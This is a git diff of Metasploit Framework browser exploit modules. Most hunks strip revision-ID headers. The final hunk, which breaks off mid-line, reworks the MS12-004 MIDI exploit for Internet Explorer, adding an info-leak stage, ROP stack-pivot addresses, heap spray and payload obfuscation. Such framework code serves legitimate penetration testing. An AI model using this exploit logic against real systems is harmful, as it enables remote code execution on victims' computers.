Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5660' ], diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index 4943fb1b5f..f7b28c1be2 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'skape', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3961'], diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 14c74adf0c..a9344df519 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6707'], diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index bdfb6eeb25..2536010624 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-1336'], diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 1948964000..2147fb915b 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'unknown', # discovered in the wild 'scriptjunkie' # Metasploit module, functionality/portability fixes ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-3765'], diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 9ad7f69f6d..498c89a6c8 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rh0', # metasploit module 'mr_me ' # win7 target ], - 'Version' => "$Revision$", 'References' => [ ['CVE', '2011-0065'], diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index bb6453a573..2ec74be8f6 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'regenrecht', # discovered and sold to ZDI 'xero', # Shenanigans ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-0073'], diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 59cf8dfa83..a42e0842c7 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote typical browser exploit) in order to gain control of the machine. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Chris Rohlf', #Matasano Security (Initial discovery according to Mozilla.org) diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index b7dbffec3f..064d091981 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'skape', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0344' ], diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index b4583b26d8..aadec4f7b0 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'san ', 'O600KO78RUS@unknown.ru', ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-4560'], diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 56c9a9f122..78f17ae2fd 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote '', 'Unknown', ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1359'], diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index bcc7c035d8..3ed3ebaaa7 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Mr.Niega ', 'M. Shirk ' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-4868' ], diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index a4109e736e..b911b49b65 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3730'], diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index cf71fbf362..596c36d49b 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -50,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote # Integrated into msf 'skape', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4777' ], diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 10a2eaee4b..3a5dcaf8bc 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Trirat Puttaraksa ', ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5745' ], diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index 2df9006175..6a517987dd 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Solar Eclipse ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-0038'], diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index 869d94a10d..442c6bff5b 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2463' ], diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index b72d7e149b..6454af7d66 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3008' ], diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index a8da23ca34..c99285fae3 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'koshi', 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3704' ], diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index bb88b1eb43..01d1d56384 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -45,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-4844'], diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index ea7e710a0b..29b66701d9 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean [at] zerodaysolutions [dot] com' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0075' ], diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index 33bcf1f745..0aa165ea7b 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1534' ], diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index a30dbb3422..92a3573463 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1136' ], diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index 154bca2aa3..9c925c5d32 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'securitylab.ir ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS09-072'], diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index f7595fea39..0a345a517c 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -45,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote 'unknown', 'hdm' # Metasploit port ], - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS10-002'], diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index b37eb3c522..773f87a04b 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -73,7 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Nanika', # HIT2010 IE7 reliable PoC 'jduck' # minor cleanups ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0806' ], diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index 2b7dad5bb4..c5b15dc774 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown', # original discovery 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0805' ], diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index bcf5104e9f..1b0613c12c 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0483' ], diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index eb7050bb60..4cc5458e55 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jordi Sanchez ', # Metasploit module - Help ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-0480'], diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 26ab21b0ad..b96b8bc8cb 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -48,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'natron' # Metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1885' ], diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 86e7c70bf6..f424617772 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'B_H' # Clean LNK template ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-2568'], diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 4fa5f4a994..cee5f962a6 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -57,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matteo Memelli', # exploit-db version 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3962' ], diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index e46bbcc3ea..f255c00450 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -48,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'd0c_s4vage', # First working public exploit 'jduck' # Metasploit module (ROP, @WTFuzz spray) ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3971' ], diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index d349ab50d3..c07fe6214b 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -1,8 +1,8 @@ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ ## require 'msf/core' @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, @@ -42,10 +43,13 @@ class Metasploit3 < Msf::Exploit::Remote (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. - Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the - msvcrt ROP to bypass DEP (Data Execution Prevention). + Note: At this time, for IE 8 target, msvcrt ROP is used by default. However, + if you know your target's patch level, you may also try the 'MSHTML' advanced + option for an info leak based attack. Currently, this module only supports two + MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3. + Or 8.0.6001.19120, which is patch level before the MS12-004 fix. - Also, based on our testing, the vulnerability does not seem to trigger when + Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop. }, 'License' => MSF_LICENSE, @@ -61,16 +65,16 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2012-0003' ], [ 'OSVDB', '78210'], [ 'BID', '51292'], - [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ], + [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ] ], 'Payload' => { - 'Space' => 1024, + 'Space' => 1024 }, 'DefaultOptions' => { 'EXITFUNC' => "process", - 'InitialAutoRunScript' => 'migrate -f', + 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => @@ -79,40 +83,27 @@ class Metasploit3 < Msf::Exploit::Remote [ 'IE 6 on Windows XP SP3', { - 'Rop' => nil, + 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { - 'Rop' => nil, + 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ], [ - 'IE 8 on Windows XP SP3 with JRE ROP', + 'IE 8 on Windows XP SP3', { # xchg ecx,esp # or byte ptr [eax],al # add byte ptr [edi+5Eh],bl # ret 8 # From IMAGEHLP - 'Rop' => :msvcr71, - 'StackPivot' => 0x76C9B4C2, - 'DispatchDst' => 0x0c0c1be4 - } - ], - [ - 'IE 8 on Windows XP SP3 with msvcrt', - { - # xchg ecx,esp - # or byte ptr [eax],al - # add byte ptr [edi+5Eh],bl - # ret 8 - # From IMAGEHLP - 'Rop' => :msvcrt, - 'StackPivot' => 0x76C9B4C2, + 'Rop' => true, + 'StackPivot' => 0x76C9B4C2, 'DispatchDst' => 0x0c0c1bd0 } ] @@ -126,11 +117,39 @@ class Metasploit3 < Msf::Exploit::Remote OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) + register_advanced_options( + [ + OptEnum.new('MSHTML', + [ + false, "MSHTML Build Version", '', + [ + '', #Default (no leaky leaky) + '8.0.6001.18702', #newly installed Win XP SP3 non patched + '8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011 + ] + ]) + ], self.class) + end + + def exploit + @m_name, @midi = get_midi + @ml_name, @midi_leak = get_midi("leak") + @second_stage_url = rand_text_alpha(10) + @leak_param = rand_text_alpha(5) + + # Offset to CFunctionPointer vftable in MSHTML + case datastore['MSHTML'] + when '8.0.6001.18702' + @offset = 0xbf190 + when '8.0.6001.19120' + @offset = 0xd92c8 + end + super end def get_target(request) agent = request.headers['User-Agent'] - vprint_status("Request from: #{agent}") + print_status("Request as: #{agent}") if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ #Windows XP SP3 + IE 6.0 @@ -139,14 +158,15 @@ class Metasploit3 < Msf::Exploit::Remote #Windows XP SP3 + IE 7.0 return targets[2] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ - #Windows XP SP3 + IE 8.0 + JRE6 + #Windows XP SP3 + IE 8.0 return targets[3] else return nil end end - def get_midi + # stage => "corruption" (default) | "leak" + def get_midi(stage="corruption") # MIDI Fileformat Reference: # http://www.sonicspot.com/guide/midifiles.html # @@ -183,9 +203,13 @@ class Metasploit3 < Msf::Exploit::Remote tc << "\x85\x50\x99\x23\x7F" # Corruption events - # Midi Channel Event - Note On - tc << "\x00\x9F\xb2\x73" - # Ends Corruption events + if stage == "corruption" + # Midi Channel Event - Note On + tc << "\x00\x9F\xb2\x73" + else + # Midi Channel Event - Note Off (trigger a leak) + tc << "\x00\x8F\xb2\x73" + end # Meta Event - End Of Track tc << "\x00\xFF\x2F\x00" @@ -201,58 +225,85 @@ class Metasploit3 < Msf::Exploit::Remote m << [tc.length].pack('N') m << tc - midi_name = "test_case.mid" + #midi_name = "test_case.mid" + midi_name = rand_text_alpha(5) + ".mid" return midi_name, m end def on_request_uri(cli, request) - if request.uri =~ /\.mid$/i - print_status("Sending midi file") - send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'}) - return - end - - #Set default target + # Initialize a target. If none suitable, then we don't continue. my_target = target - - #If user chooses automatic target, we choose one based on user agent if my_target.name =~ /Automatic/ my_target = get_target(request) - if my_target.nil? + agent = request.headers['User-Agent'] + if my_target.nil? and agent !~ /Windows\-Media\-Player|NSPlayer/ send_not_found(cli) print_error("Unknown user-agent") return end - vprint_status("Target selected: #{my_target.name}") + vprint_status("Target selected: #{my_target.name}") if not my_target.nil? end + # Send the corrupt midi file to trigger a memory leak, or a crash to that points + # to an arbitrary address. + if request.uri =~ /#{@ml_name}$/i + print_status("Testing for info leak...") + send_response(cli, @midi_leak, {'Content-Type'=>'application/octet-strem'}) + return + elsif request.uri =~ /#{@m_name}$/i + print_status("Sending midi corruption file...") + send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'}) + return + end + + # Send the appropriate stage + if datastore['MSHTML'].to_s != '' and my_target['Rop'] + if request.uri =~ /#{@second_stage_url}/ + leak = begin + request.uri_parts["QueryString"][@leak_param].to_i + rescue + 0 + end + print_status("Leaked address: 0x#{leak.to_s(16)}") + send_stage(cli, my_target, 'trigger', leak) + return + end + send_stage(cli, my_target, 'leak') + else + send_stage(cli, my_target) + end + end + + def send_stage(cli, my_target, stage='trigger', leak=0) midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource - midi_uri << "/#{@m_name}" - spray = build_spray(my_target) - - if datastore['OBFUSCATE'] - spray = ::Rex::Exploitation::JSObfu.new(spray) - spray.obfuscate + if stage == 'leak' + midi_uri << "/#{@ml_name}" + trigger = build_trigger(my_target, "leak") + else + midi_uri << "/#{@m_name}" + trigger = build_trigger(my_target) + spray = build_spray(my_target, leak) end - trigger = build_trigger(my_target) - trigger_fn = "trigger" - if datastore['OBFUSCATE'] + spray = ::Rex::Exploitation::JSObfu.new(spray).obfuscate trigger = ::Rex::Exploitation::JSObfu.new(trigger) trigger.obfuscate - trigger_fn = trigger.sym("trigger") + trigger_fn = trigger.sym('trigger') + else + trigger_fn = 'trigger' end html = %Q| + @@ -276,39 +327,34 @@ class Metasploit3 < Msf::Exploit::Remote html = html.gsub(/^\t\t/, '') - print_status("Sending HTML") + print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - def exploit - @m_name, @midi = get_midi - super - end - - def build_spray(my_target) + def build_spray(my_target, leak=0) # Extract string based on target - if my_target.name =~ /JRE ROP$/ + if my_target.name == 'IE 8 on Windows XP SP3' js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);" - js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;" - elsif my_target.name =~ /msvcrt$/ - js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" - js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;" else js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" - js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;" end # Build shellcode based on Rop requirement - if my_target['Rop'] - code = create_rop_chain(my_target) + code = '' + if 